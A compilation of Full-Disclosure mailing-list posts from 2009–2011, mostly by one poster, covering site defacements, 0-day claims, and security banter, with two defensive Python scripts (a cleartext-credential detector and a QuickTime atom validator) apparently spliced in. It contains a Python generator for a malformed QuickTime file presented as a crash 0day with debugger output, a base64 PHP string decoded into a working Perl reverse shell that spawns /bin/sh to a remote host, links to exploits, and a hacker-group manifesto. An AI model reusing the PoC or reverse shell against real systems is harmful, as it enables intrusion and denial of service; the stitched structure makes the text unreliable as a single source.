Re: [Full-disclosure] SOngs.pk Hacked ! By Indian Hacker Team (Due to Mumbai Terror)
I always had a feeling pirates were behind such attacks. But music pirates seem to be a bit too much.

On Fri, Jul 15, 2011 at 10:09 PM, Silic0n wrote:
> http://songs.pk/usersonline/usersonline.php
>
> Hacked
>
> BY: *Mr52, R00t_d3vil, InX_rOot, -[SiLeNtp0is0n]-, Lucky, Silic0n, Ne0_h4ck3r, dodo, and Team ICA*
>
> Pray for all the innocent victims of the Mumbai attack..
> This is a small answer from All Indians.. Remember we are Together..
> You can just kill innocent people.. Women & Children..
> But There is no Future for you.. We are coming with huge speed..
> Corruption will be under control.. Every Indian will have Money n Power..
> Then there will be no one to Save you..
> You are a dirty stamp on Pure Islam.. Try to Understand & Respect it..
> Just Remember We are coming
> Bye..
> Exit
> _
>
> Submit Your comment here..
> <http://www.anvilbook.com/guestbook.php?mumbai>
> Use Proper language.
>
> Comment here http://www.anvilbook.com/guestbook.php?mumbai
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

--
Regards,
webDEViL
http://twitter.com/w3bd3vil
Re: [Full-disclosure] CCAvenue.com Payment Gateway Vulnerable SQL Injection UPDATE
Let's trust software from Microsoft or Apple.

On Thu, May 19, 2011 at 12:33 PM, David Blanc wrote:
> On Sat, May 7, 2011 at 6:53 PM, Xa Buri wrote:
>>
>> So who finally did it and when? ispy or d3hydr8? And I still don't buy the whole SQL Injection theory. There is no proof. Looks more like an insider dump.
>>
>
> Never trust an Indian software company.
>
> http://hackerstreet.in/item?id=6323
>
> http://blog.susam.in/2011/05/infosys-tcs-or-wipro.html

--
Regards,
webDEViL
http://twitter.com/w3bd3vil
Re: [Full-disclosure] Real Player 0day for WinXP
You should read up on same origin policy or ActiveX kill bits. Bypassing that is considered a vulnerability.

Sent from my iPhone

On Jul 9, 2010, at 12:17 AM, mutiny wrote:
> It's not a new vulnerability. It's just a new exploit. Quit bitching.
>
> webDEViL wrote:
>> I will leave that up to you to understand.
>>
>> Sent from my iPhone
>>
>> On Jul 8, 2010, at 11:00 PM, Shreyas Zare wrote:
>>> Hi,
>>>
>>> And how is this real player 0day when you are exploiting windows hcp vulnerability?
>>>
>>> Regards,
>>>
>>> Shreyas Zare
>>> Sr. Information Security Researcher
>>> Secfence Technologies
>>> www.secfence.com
>>>
>>> On Thu, Jul 8, 2010 at 12:13 PM, webDEViL wrote:
>>>> http://krash.in/real-exp/exploit.ram
>>>> Uses MS Help vuln.
>>>>
>>>> --webDEViL
Re: [Full-disclosure] Real Player 0day for WinXP
I will leave that up to you to understand.

Sent from my iPhone

On Jul 8, 2010, at 11:00 PM, Shreyas Zare wrote:
> Hi,
>
> And how is this real player 0day when you are exploiting windows hcp vulnerability?
>
> Regards,
>
> Shreyas Zare
> Sr. Information Security Researcher
> Secfence Technologies
> www.secfence.com
>
> On Thu, Jul 8, 2010 at 12:13 PM, webDEViL wrote:
>> http://krash.in/real-exp/exploit.ram
>> Uses MS Help vuln.
>>
>> --webDEViL
[Full-disclosure] Real Player 0day for WinXP
http://krash.in/real-exp/exploit.ram

Uses MS Help vuln.

--webDEViL
Re: [Full-disclosure] Egurra: A dumb file format fuzzer
Has this got anything different from FileFuzz, released years ago?

Sent from my iPhone

On Jun 3, 2010, at 5:08 PM, Jon wrote:
> Hello FD,
>
> As a personal exercise I wrote a Python based "dumb" file format fuzzer.
> Its mechanics are simple and robust and its modular design allows you to fuzz any app that gets input files as a parameter.
> You can get a copy of it and a more elaborate explanation at http://www.morenops.com/?p=673
>
> Cheers,
>
> --
> jg - www.morenops.com
Re: [Full-disclosure] denial-of-service vulnerability in the Microsoft Malicious Software Removal Tool
All said and done, that doesn't make it a vulnerability.

On Sun, May 23, 2010 at 11:47 PM, lsi wrote:
> On 23 May 2010 at 16:34, Thor (Hammer of God) wrote:
>
> From: "Thor (Hammer of God)"
> To: "full-disclosure@lists.grok.org.uk" disclos...@lists.grok.org.uk>
> Date sent: Sun, 23 May 2010 16:34:24 +
> Subject: Re: [Full-disclosure] denial-of-service vulnerability in the Microsoft Malicious Software Removal Tool
>
>> And where's the part where the system was rendered unbootable?
>
> The unbootable part comes when you replace NDIS.SYS. Unless you know to replace the registry keys first, which is certainly not obvious from the MRT log.
>
>> And how did your users get infected with Cutwail? Let me guess... they are all still running XP and you've got them running as local administrators right? And they get to download codecs "willy nilly" and are probably using Bittorrent to get illegal copies of software pre-infected with cutwail, right?
>
> How do I know how they got infected? These are all third-party companies (my customers); sometimes when they have cash problems, they don't call me, they try and do it themselves, or do nothing. I might not see them for months. They don't want to upgrade - they heard about Vista (LOL) and they don't have, or don't want to spend, the money.
>
> This is reality, not some managed datacentre in Redmond.
>
>> local administrators
>
> Their apps needed it last I checked. I didn't set up their machines. They have not asked me to look at that. I have enough trouble getting work OK'd without putting my neck on the line suggesting a configuration change which I cannot guarantee will not cause instability, particularly with their legacy and unsupported software, of which there is plenty.
>
> Again, this is reality, not some managed datacentre in Redmond.
>
>> Bittorrent
>
> No, like this:
>
> "Stuart, need your help. My computer has a virus. Yesterday night I opened an email that I was expecting from a Bernice. It turned out that it was the wrong Bernice and it was a virus. It loaded Security Essentials 2010 which is a scarevirus to make the user believe that there are virus a pay for their software which does nothing anyway. It has loaded a virus in the registry file. There is a lot about it on the net. I then found a PC tools download to remove. However when I turned my computer off it does not now allow me to log on. I have turned it off. I am without a PC now. Can you come tomorrow to resolve it for me? Many thanks. Please let me know as I need it urgently."
>
>> Regardless, let's see if we have your advisory correct. In order to be a victim of this "Denial of Service Vulnerability" we must first get infected with something like Cutwail
>
> true
>
>> that runs with user interaction
>
> false. Cutwail has no known infection vectors. However, Cutwail is just an example.
>
>> interaction and also requires administrator privileges (you can see that NDIS.SYS was altered).
>
> When I am logged in as Admin and try to replace NDIS.SYS, Windows File Protection replaces it. Why did WFP fail to protect the file against Cutwail in the first place, and how can a virus replace NDIS.SYS using Administrative privs, if I cannot do it myself when Administrator?
>
>> Of course, your AV must be at least 2 years old too.
>
> false, it was up-to-date, although I am questioning its effectiveness
>
>> Then, once we get infected with malware, we run MRT, and see in the logs that it was successfully removed and requires a reboot.
>
> Actually, AV found the virus in NDIS.SYS but could not remove it. So I ran MRT because I thought that a Microsoft product would know this is a Windows file that cannot simply be deleted. MRT says it's done and needs reboot, so I reboot... and the system is toast.
>
> To clarify, in this particular case, on the first reboot you can log in in normal mode, but cannot use any network adapters (code 39 - driver corrupted or missing). Reinstalling the drivers doesn't help. So then you think, oh that's because NDIS was trashed by MRT, so I'll just replace NDIS.SYS
>
> And that's when you get the BSOD on boot to normal mode. So then you need to figure out that the cause of that BSOD is a missing registry key, then you need to figure out which keys (there are three, one for each controlset), then you need to get the correct keys from a clean machine, then you need to figure out how to replace the keys (some of them cannot be imported with mere Administrative permissions).
>
> However, just last week I also fixed a problem with the userinit registry key, also mysteriously deleted - why would a virus trash its host? Answer: it doesn't, I think it was MRT that trashed it. A missing userinit key means instant logoff on logon, even in safe mode as Admi
Re: [Full-disclosure] Microsoft Windows TCP/IP Timestamps Code Execution Vulnerability
That's what binary diffing is all about.

Sent from my iPhone

On Nov 27, 2009, at 7:59 AM, Ivan Security wrote:
> Hi list,
>
> Does anyone have more details about this vulnerability? The advisory just says:
> "The vulnerability exists due to the TCP/IP stack not cleaning up state information correctly. This causes the TCP/IP stack to reference a field as a function pointer when it actually contains other information"
> I'd like to know a bit more in order to test it and make some research.
>
> Regards,
>
> Ivan.
Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
Very sad news indeed.

On Wed, Nov 4, 2009 at 6:49 PM, Micheal Turner wrote:
> We are mourning a good friend today. I first began talking to str0ke when I started publishing exploit codes onto this mailing list; he would always be polite and friendly in his emails. I got to know him over the years and am saddened by his departure; he contributed to the exploit scene and hacking subculture in a huge way. The last time I talked with him I asked him if I could interview him for my blog; he laughed and said he should be interviewing the exploit writers since he didn't do anything. That was str0ke, and str0ke did a lot: he always fought for the rights of the exploit developers and his website was the bread and butter of many a hacker's day. He will sadly be missed by many people, hackers & friends.
>
> At least now we can post exploits without that damn // milw0rm.com comment being added to the end!!! ;-) I joke, this code is dedicated to you str0ke. R.I.P my friend.
>
> http://www.hackerfantastic.com/archive/exploits/prdelka-vs-APPLE-ptracepanic.c
Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail
This particularly came in handy when we had those cable connections widespread. Basically this has been there since the time rediff started.

Sent from my iPhone

On Sep 10, 2009, at 4:14 PM, kalyan wrote:

Dear all, is it a good mail? What do you feel, guys? It doesn't encrypt your passwords.

POST /cgi-bin/login.cgi HTTP/1.1
Host: mail.rediff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.rediff.com/
Cookie: RuW=1252586041360329; RsW=IND; RLOC=%5F%5FeZMqPfDceMg%5F%5F4P6Xdf5DkD2%5F%5FtHonjGX8AnI%5F%5Find%5F%5F; Rt=%3D%3DAMwAjN3czN; accounttype=77; Rp=g%3D2%26a%3D24%26c%3D08%26s%3D29%26cn%3D099%26z%3D123456%26p%3D034%26e%3D05%26d%3D_04%26i%3D_35_%26dor%3D20060220%26mi%3D3; RMID=7c7dc92f4aa8f200; RMFS=011MljEWU107fl; app_lang=; ckey=70795
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

login=evil.devil&passwd=devil.evil&remember=1&FormName=existing

Regards
Kalyan
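The capture above shows a login form whose password travels as an ordinary urlencoded field over plain HTTP. As an added example (not part of the thread), the following Python script parses a raw HTTP/1.x request the way a proxy or IDS plugin would and reports credentials that were sent without TLS; it also flags HTTP Basic authorization headers, which the post does not mention but which leak the same way. The request text, host name and header values are constructed for the example and the field-name list is an assumption to be tuned per application.

```python
"""Flag credentials submitted in cleartext HTTP requests.

Added example, not from the original post.  The sample request below is
constructed (hostname, user agent and credentials are made up) and only
resembles the kind of POST quoted in the thread.
"""
from urllib.parse import parse_qs

# Form field names that usually carry a secret; an assumption, extend per application.
SECRET_FIELDS = ("passwd", "password", "pass", "pwd", "pin", "secret", "token")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3:
        raise ValueError("malformed request line: %r" % lines[0])
    method, target, version = parts
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def mask(value: str) -> str:
    """Keep the first character so an analyst can correlate, hide the rest."""
    return value[:1] + "*" * max(len(value) - 1, 0)


def cleartext_credentials(raw: str, over_tls: bool) -> list:
    """Return (field, masked_value) pairs for secrets that travelled without TLS.

    A raw request cannot tell on its own whether the stream was TLS-wrapped,
    so the capture layer passes that in as over_tls.
    """
    if over_tls:
        return []
    req = parse_request(raw)
    findings = []
    # Basic auth is base64, not encryption: the same exposure as a form field.
    auth = req["headers"].get("authorization", "")
    if auth.lower().startswith("basic "):
        findings.append(("Authorization", "Basic " + "*" * 8))
    ctype = req["headers"].get("content-type", "")
    if req["method"] == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        for name, values in parse_qs(req["body"], keep_blank_values=True).items():
            if name.lower() in SECRET_FIELDS:
                findings.extend((name, mask(v)) for v in values)
    return findings


# Constructed sample request, modelled on the shape of the one in the post.
SAMPLE_REQUEST = (
    "POST /cgi-bin/login.cgi HTTP/1.1\r\n"
    "Host: mail.example.test\r\n"
    "User-Agent: constructed-sample/1.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 55\r\n"
    "\r\n"
    "login=alice&passwd=hunter2&remember=1&FormName=existing"
)

# Constructed sample with Basic auth (base64 of a made-up "alice:hunter2").
SAMPLE_BASIC = (
    "GET /inbox HTTP/1.1\r\n"
    "Host: mail.example.test\r\n"
    "Authorization: Basic YWxpY2U6aHVudGVyMg==\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw in (("form post", SAMPLE_REQUEST), ("basic auth", SAMPLE_BASIC)):
        print(label, "->", cleartext_credentials(raw, over_tls=False))
```

The `over_tls` flag is deliberately explicit: the request bytes look identical on a TLS-terminated and a plaintext connection, so the decision must come from the capture point, not from the parser.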
Re: [Full-disclosure] Hindustan Times epaper Server Hacked
Maa Ki Kirkiri

Congrats to Sky for finding "architectural flaws" in a paper which costs Rs 2.50. Wow, thanks! You saved me $1.5 per month. I owe you one! ;)

Btw, my local area library will get me HT papers dated before 2004.

If you are against HT "looting" people, why the hell ask them to contact you to correct the "flaws"? Hypocrite.

"I would like to dedicate this hack towards Club Calvin @ http://www.clubcalv.in and all cute kids"

Very Pedo... hahaha

wD

On Sun, Aug 9, 2009 at 8:56 AM, Sky wrote:
> Hindustan Times epaper Server Hacked
> http://sky.net.in/hindustan-times-epaper-server-hacked/
>
> Hindustan Times (HT) is India's leading newspaper, published since 1924 with roots in the independence movement. In 2008, the newspaper reported that with a (circulation of over 1.14 million) ranking them as the third largest circulatory daily English Newspaper in India. The Mumbai edition was launched on 14 July 2005. HT has a readership of (6.6 million) ranking them as the second most widely read English Newspaper after Times of India. (Source: Wikipedia article on Hindustan Times) - http://en.wikipedia.org/wiki/Hindustan_Times
>
> HindustanTimes + Hindustan epaper Server Hacked
>
> http://lh4.ggpht.com/_gbWPSul_tCM/Sn5UNhLLVYI/ASM/JY9bc67HV14/s800/hindustan_times_hacked.jpg
>
> Why was Hindustan Times (HT) epaper Server Hacked?
>
> Many people think that Hindustan Times (HT) (English Edition) + Hindustan (Hindi Edition) is available on the internet free of cost. HT Media has made it compulsory to register on their website in order to read the daily online edition of their published newspapers; on completion of registration HT Media provides you instant access to read the daily edition. The CATCH is - you can only read the daily edition + past seven days' editions (from the current date) as a free user, whereas if you wanna read any edition beyond seven days, you will have to pay a huge (rip off) amount to HT Media (in the name of digital archive subscription).
>
> Registration Information Collected by HindustanTimes
>
> http://lh6.ggpht.com/_gbWPSul_tCM/Sn5WIrsZxcI/ASs/Lc6NaQzxEfk/s800/HT_registration.jpg
>
> Free HindustanTimes Editions
>
> http://lh6.ggpht.com/_gbWPSul_tCM/Sn5UN35Yx5I/ASU/6THfLaMu00M/s800/HT_free_editions.jpg
>
> Restricted Access to HindustanTimes epaper Archives
>
> http://lh4.ggpht.com/_gbWPSul_tCM/Sn5UN5umsJI/ASY/5_SfNzOEm7w/s800/HT_newspaper_subscribe.jpg
>
> Archive Subscription Charges for HindustanTimes is a total Rip Off
>
> http://lh4.ggpht.com/_gbWPSul_tCM/Sn5ViIwx2aI/ASo/6TMgKDuc6Vg/s800/HT_archive_charges.jpg
>
> As a hacker, i think it's not fair (for anyone) to loot common people and sell (publicly gained) information in such a way, so i decided to peek inside the server and find some bugs / architectural flaws which would allow me to access past newspaper (Images / PDF) editions for free.
>
> Within a couple of hours, i managed to find some bugs / architectural flaws (& vulnerabilities) which gave out free access to the past (Images / PDF) newspaper editions.
>
> Calvin and Hobbes publishing error
>
> I used to search the newspaper (HT hard copy) every morning for technology related news (hoping any Indian journalist must have written some piece); that went on for like weeks and then i started reading Calvin and Hobbes (the comic strip) every day published in HT Cafe.
>
> On 2nd / 4th / 9th June, Hindustan Times (HT) published the same Calvin and Hobbes strip. How should i react against this publishing error by Hindustan Times? As a fan of Calvin and Hobbes, i expect a new comic strip every day.
>
> Check out the exact same Calvin and Hobbes strip published thrice on various days in the single month of June (2009):
>
> 2nd June
> http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/02/538/02_06_2009_538_013.jpg
>
> 9th June
> http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/09/538/09_06_2009_538_002.jpg
>
> 4th June
> http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/04/538/04_06_2009_538_006.jpg
>
> Informing the privileged authorities
>
> On 10th July 2009, i informed the editor and other top most authorities @ HindustanTimes via email regarding the serious bugs / flaws (& vulnerabilities) on their ePaper Server which can be exploited to compromise data and cause financial losses for HT Media.
>
> My email to HindustanTimes
>
> http://lh5.ggpht.com/_gbWPSul_tCM/Sn5WJt3UKGI/AS0/KOnhjTtBNnk/s800/my_email_hindustan_times.jpg
>
> Rashmi Chugh's reply to me
>
> http://lh4.ggpht.com/_gbWPSul_tCM/Sn5W9mSD0pI/ATI/O5hazb5IIY4/s800/rashmi_livemint_reply.jpg
>
> Although i received a reply from Rashmi Chugh (Business Head and Publisher, LIVEMINT) within 3 minutes, i waited for 24 hours to receive other recipients' reply (as i wanted to know what they thought about the issue) but sadly no one replied back except Rashmi Chug
Re: [Full-disclosure] zf05
Sheer Entertainment!! You get to know stuff that you couldn't have possibly known about your own mates, wrt BHF.

On Wed, Jul 29, 2009 at 7:31 AM, Redden Truly wrote:
> http://www.leetupload.com/zf05.txt
Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered
lol, what makes you think they will fall for it?

On Thu, Jul 16, 2009 at 9:01 AM, anti-scared-sheep <securyourbr...@gmail.com> wrote:
> Hey she...@fd,
> Stop being scared about these kids, they fucking suck!
> you shouldn't have taken LSD, makes you paranoid even 7 years later, i guess u guys should consult a doctor.
> @anti-sec_kids: This is my server : http://207.182.131.158/index.html
> Hack it, and i'll stfu.
> While waiting your l33t-prick hack, @reverseDNS on unsecure shared-webhoster, no wonder i'll laugh @you.
>
> Die in a fire kids.
Re: [Full-disclosure] Blackhat-forum.com Hacked - Anti-sec
you got the sitename wrong!!

On Wed, Jul 15, 2009 at 8:17 PM, anti sec wrote:
> upz i think i did it again, shoutz out to modem peace
>
> On Wed, Jul 15, 2009 at 10:36 PM, anti sec wrote:
>> Blend in.
>> Get trusted.
>> Trust no one.
>> Own everyone.
>> Disclose nothing.
>> Destroy everything.
>> Take back the scene.
>> Never sell out, never surrender.
>> Get in as anonymous, Leave with no trace.
>>
>> ~anti-sec
[Full-disclosure] Apple QuickTime 0day
Try it with your latest quicktime player.

--

#0:000> !exploitable -v
#HostMachine\HostUser
#Executing Processor Architecture is x86
#Debuggee is in User Mode
#Debuggee is a live user mode debugging session on the local machine
#Event Type: Exception
#Exception Faulting Address: 0x66830f9b
#First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC0FD)
#
#Faulting Instruction:66830f9b push ebx
#
#Basic Block:
#66830f9b push ebx
# Tainted Input Operands: ebx
#66830f9c push ebp
#66830f9d mov ebp,dword ptr +0x41f (0420)[esp]
#66830fa4 push esi
#66830fa5 push edi
#66830fa6 mov edi,ecx
#66830fa8 cmp edi,offset +0x5ff (0600)
#66830fae mov ebx,edx
#66830fb0 mov dword ptr [esp+14h],eax
#66830fb4 mov byte ptr [esp+10h],0
#66830fb9 mov byte ptr [esp+11h],0
#66830fbe mov byte ptr [esp+12h],0
#66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4)
#
#Exception Hash (Major/Minor): 0x614b6671.0x614b786e
#
#Stack Trace:
#QuickTime!DllMain+0x2fabb
#+0x1231137
#Instruction Address: 0x66830f9b
#
#Description: Stack Overflow
#Short Description: StackOverflow
#Exploitability Classification: UNKNOWN
#Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e)

print "--"
print "w3bd3vil [at] gmail [dot] com"
print "Apple QuickTime CRGN Atom 0day"
print "--"

bytes = [
    0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70, 0x35, 0x00, 0x00, 0x01, 0x00,
    0x33, 0x67, 0x70, 0x35, 0x33, 0x67, 0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76,
    0x00, 0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00, 0xBF, 0x88, 0x12, 0x28,
    0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02, 0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0xA2,
    0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B, 0x68, 0x64, 0x00, 0x00, 0x00, 0x01,
    0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63, 0x72, 0x67, 0xFF,
    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64,
    0x74, 0x73, 0x00, 0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x08, 0x66, 0x72, 0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65
]

f = open("webDEViL.mov", "wb")
for byte in bytes:
    f.write("%c" % byte)
f.close()
print "webDEViL.mov created! (%d bytes)" % len(bytes)
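The crash above is triggered by a clipping-region atom whose declared sizes do not agree with the bytes that carry it. As an added example (not the post's PoC and not Apple's code), the following Python walks the atom tree of a QuickTime file, checks every atom against its parent's bounds, and validates the QuickDraw region inside each 'crgn' atom (a 2-byte region size followed by an 8-byte bounding rectangle, per the QuickTime file format description). That is the kind of check an ingest filter or crash-triage script applies before a decoder ever sees the file. The samples are constructed in the script, the container list is a deliberately small subset of the real format, and the region layout beyond the first 10 bytes is not interpreted.

```python
"""Walk QuickTime/MP4 atoms and validate clipping-region ('crgn') sizes.

Added example, not part of the original post.  It builds its own small
'moov' fragments (constructed here): one whose 'crgn' is consistent and one
whose declared region size is far larger than the atom that carries it.
"""
import struct

# Atoms whose payload is a list of child atoms.  Subset, enough for this example.
CONTAINERS = {b"moov", b"trak", b"clip", b"edts"}


def atom(kind: bytes, payload: bytes) -> bytes:
    """Serialise one atom: 32-bit big-endian size (header included), 4-byte type, payload."""
    return struct.pack(">I", 8 + len(payload)) + kind + payload


def crgn(region_size: int, rect=(0, 0, 144, 176)) -> bytes:
    """Build a 'crgn' atom: QuickDraw region = 2-byte size, 8-byte rect (top, left, bottom, right)."""
    return atom(b"crgn", struct.pack(">Hhhhh", region_size, *rect))


def walk(buf: bytes, start: int = 0, end: int = None, depth: int = 0):
    """Yield (depth, type, offset, size, payload) for every atom, enforcing parent bounds."""
    end = len(buf) if end is None else end
    pos = start
    while pos < end:
        if end - pos < 8:
            raise ValueError("truncated atom header at offset %d" % pos)
        size, kind = struct.unpack(">I4s", buf[pos:pos + 8])
        # A size below 8 would loop forever; a size past the parent reads outside it.
        if size < 8 or pos + size > end:
            raise ValueError("atom %r at offset %d declares size %d but only %d bytes remain in its parent"
                             % (kind, pos, size, end - pos))
        payload = buf[pos + 8:pos + size]
        yield depth, kind, pos, size, payload
        if kind in CONTAINERS:
            yield from walk(buf, pos + 8, pos + size, depth + 1)
        pos += size


def check_regions(buf: bytes) -> list:
    """Return a list of problem strings for 'crgn' atoms; an empty list means clean."""
    problems = []
    for depth, kind, offset, size, payload in walk(buf):
        if kind != b"crgn":
            continue
        if len(payload) < 10:
            problems.append("crgn at %d: payload is %d bytes, need at least 10" % (offset, len(payload)))
            continue
        region_size, top, left, bottom, right = struct.unpack(">Hhhhh", payload[:10])
        if region_size < 10:
            problems.append("crgn at %d: region size %d is smaller than its own header" % (offset, region_size))
        elif region_size > len(payload):
            problems.append("crgn at %d: region size %d exceeds atom payload of %d bytes"
                            % (offset, region_size, len(payload)))
        if bottom < top or right < left:
            problems.append("crgn at %d: inverted bounding rect %r" % (offset, (top, left, bottom, right)))
    return problems


def is_well_formed(buf: bytes) -> bool:
    """True when every atom fits inside its parent (region contents are not judged here)."""
    try:
        for _ in walk(buf):
            pass
        return True
    except ValueError:
        return False


# Constructed samples: a clean track, and a track whose region claims 0xFFFF bytes.
GOOD_TRACK = atom(b"trak", atom(b"clip", crgn(10)))
BAD_TRACK = atom(b"trak", atom(b"clip", crgn(0xFFFF, (-1, -1, -1, -1))))
SAMPLE_GOOD = atom(b"moov", GOOD_TRACK)
SAMPLE_BAD = atom(b"moov", GOOD_TRACK + BAD_TRACK)

if __name__ == "__main__":
    print("good sample:", check_regions(SAMPLE_GOOD) or "no problems")
    print("bad sample:", check_regions(SAMPLE_BAD))
    print("truncated bad sample well-formed?", is_well_formed(SAMPLE_BAD[:-4]))
```

The walker refuses sizes below 8 and sizes that overrun the parent before it yields anything, so a malformed outer atom is rejected before any inner content is parsed; the region check runs only on atoms that already passed that bound.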
Re: [Full-disclosure] connect back PHP hack
Must be off the r57 php shell.

Regards,
webDEViL

On Wed, Feb 11, 2009 at 12:14 AM, Razi Shaban wrote:
> On Tue, Feb 10, 2009 at 8:23 PM, sr. wrote:
>> can anyone tell me what encoding this is?
>>
>> $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
>> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
>> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
>> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
>> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
>> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
>> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
>>
>> this has to do with old php 4.x.x version with magic quotes enabled.
>> i'm just trying to figure out what the connect back code does.
>>
>> any input is much appreciated.
>>
>> thx,
>>
>> sr.
>
> Base64, the "==" at the end gives it away. It decrypts to:
>
> #!/usr/bin/perl
> use Socket;
> $cmd= "lynx";
> $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
> $0=$cmd;
> $target=$ARGV[0];
> $port=$ARGV[1];
> $iaddr=inet_aton($target) || die("Error: $!\n");
> $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
> $proto=getprotobyname('tcp');
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> open(STDIN, ">&SOCKET");
> open(STDOUT, ">&SOCKET");
> open(STDERR, ">&SOCKET");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
>
> --
>
> Regards,
> Razi Shaban
